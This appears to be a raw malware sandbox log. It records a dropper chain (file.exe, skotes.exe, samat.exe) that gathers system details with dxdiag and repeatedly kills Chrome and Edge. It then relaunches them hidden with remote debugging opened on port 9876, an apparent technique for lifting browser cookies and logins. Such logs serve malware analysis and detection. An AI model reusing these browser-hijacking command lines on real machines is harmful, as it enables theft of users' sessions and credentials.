Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2008 --field-trial-handle=1964,i,6524152562037050844,4104416786767478461,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2088 --field-trial-handle=1992,i,15396176104267076459,4576140029387064159,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1824 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:3
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-sandbox --mojo-platform-channel-handle=5212 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --mojo-platform-channel-handle=5288 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1900 --field-trial-handle=1820,i,7547783680648845572,51913072553389247,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=1944,i,16409252098928237948,2804454962869156604,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1992 --field-trial-handle=1984,i,13849923393269030122,6960310804162820748,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1976 --field-trial-handle=2008,i,9308063002193397324,7617717190082231844,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,12058209678058939183,18292394788327998735,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=2072,i,10086388543525150853,10806765783338913664,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2008 --field-trial-handle=1964,i,6524152562037050844,4104416786767478461,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2088 --field-trial-handle=1992,i,15396176104267076459,4576140029387064159,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1824 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-sandbox --mojo-platform-channel-handle=5212 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --mojo-platform-channel-handle=5288 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1900 --field-trial-handle=1820,i,7547783680648845572,51913072553389247,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=1944,i,16409252098928237948,2804454962869156604,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1992 --field-trial-handle=1984,i,13849923393269030122,6960310804162820748,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1976 --field-trial-handle=2008,i,9308063002193397324,7617717190082231844,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,12058209678058939183,18292394788327998735,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1796 --field-trial-handle=1976,i,7400251867187163904,16596075297624197194,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=2072,i,10086388543525150853,10806765783338913664,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
